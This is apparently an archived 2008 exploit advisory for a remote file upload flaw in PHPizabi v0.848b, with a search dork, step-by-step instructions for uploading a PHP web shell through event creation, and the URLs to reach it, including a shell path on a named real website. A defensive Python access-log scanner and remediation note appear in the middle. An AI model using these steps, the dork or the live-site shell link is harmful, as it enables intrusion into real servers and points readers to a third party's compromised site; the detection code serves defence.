############################################
Powered by PHPizabi v0.848b C1 HFP1 remote file upload
author: ZoRLu
home: www.yildirimordulari.org
contact: trt-turk@hotmail.com
dork: "Powered by PHPizabi v0.848b C1 HFP1"
############################################
exploit:
http://localhost/izabi/system/cache/pictures/id_shell.php
- First, register on the web site.
- Click "Create an event" and create an event (direct create-event URL: http://localhost/izabi/?L=events.create).
- Write the event title and description. For "show to", select "All the users". Click the Browse (gözat) button and upload shell.php.
- Afterwards, go to the event page. Right-click the uploaded photo, click Properties in the menu that opens, and copy the URL.
example:
http://localhost/izabi/system/image.php?file=xxx_shell.php&width=500
and
exploit:
http://localhost/izabi/system/cache/pictures/xxx_shell.php
example web site:
http://bitchinindie.com/system/image.php?file=597_shell.php&width=500
exploit shell.php
http://bitchinindie.com/system/cache/pictures/597_shell.php
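
A defender-side check for the two request patterns this advisory describes, as an added example that is not part of the original advisory: it scans web-server access logs (combined log format assumed) for script files requested directly from system/cache/pictures/ or passed to system/image.php in the file parameter. The extension list, the function names and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Extensions commonly mapped to the PHP handler (assumption; match your server config).
SCRIPT_EXT = re.compile(r"\.(php\d?|phtml|phar)$", re.IGNORECASE)
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+" (\d{3})')

def classify(line):
    """Return (rule, filename, status) if the log line matches a rule, else None."""
    m = REQUEST.search(line)
    if not m:
        return None
    target, status = m.group(1), int(m.group(2))
    parts = urlsplit(target)
    path = unquote(parts.path)
    # Rule 1: a script requested straight from the picture cache directory.
    if "/system/cache/pictures/" in path and SCRIPT_EXT.search(path):
        return ("script-in-picture-cache", path.rsplit("/", 1)[1], status)
    # Rule 2: the thumbnailer asked to render a file that is not an image.
    if path.endswith("/system/image.php"):
        for name in parse_qs(parts.query).get("file", []):
            if SCRIPT_EXT.search(name):
                return ("script-via-image.php", name, status)
    return None

# Constructed sample log lines (not taken from a real server).
SAMPLE_LOG = """\
203.0.113.7 - - [17/Feb/2008:10:01:02 +0000] "GET /izabi/?L=events.create HTTP/1.1" 200 5120
203.0.113.7 - - [17/Feb/2008:10:02:40 +0000] "GET /izabi/system/image.php?file=123_shell.php&width=500 HTTP/1.1" 200 0
203.0.113.7 - - [17/Feb/2008:10:03:11 +0000] "GET /izabi/system/cache/pictures/123_shell.php HTTP/1.1" 200 812
198.51.100.4 - - [17/Feb/2008:10:05:00 +0000] "GET /izabi/system/image.php?file=88_party.jpg&width=500 HTTP/1.1" 200 20480
198.51.100.4 - - [17/Feb/2008:10:05:09 +0000] "GET /izabi/system/cache/pictures/88_party.jpg HTTP/1.1" 200 40960
"""

def scan(text):
    """Return a list of (client_ip, rule, filename, status) for every matching line."""
    hits = []
    for line in text.splitlines():
        hit = classify(line)
        if hit:
            hits.append((line.split(" ", 1)[0],) + hit)
    return hits

if __name__ == "__main__":
    for ip, rule, name, status in scan(SAMPLE_LOG):
        note = "served, investigate" if status == 200 else "not served"
        print(f"{ip} {rule} {name} -> {status} ({note})")
```

A 200 response on the script-in-picture-cache rule means the server executed or served a script from the upload directory; the durable fix is to reject non-image uploads and disable script execution for that directory.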
##################################################
thanx: str0ke, FaLCaTa, ReD_KaN, edish, harded, aRKi, z3h!r, the_KaM!L, vur6un, siircicocuk, Dr. SaLTuK, kasırga(lavrens), avkidis, head_hunter
and all yildirimordulari.org users
siircicocuk, where have you been, buddy? Get on MSN, we miss you :)))
## Whether yildirimordulari.org will come back online or not is anyone's guess, but one thing is known: it is a legend ##
#################################################
# milw0rm.com [2008-02-17]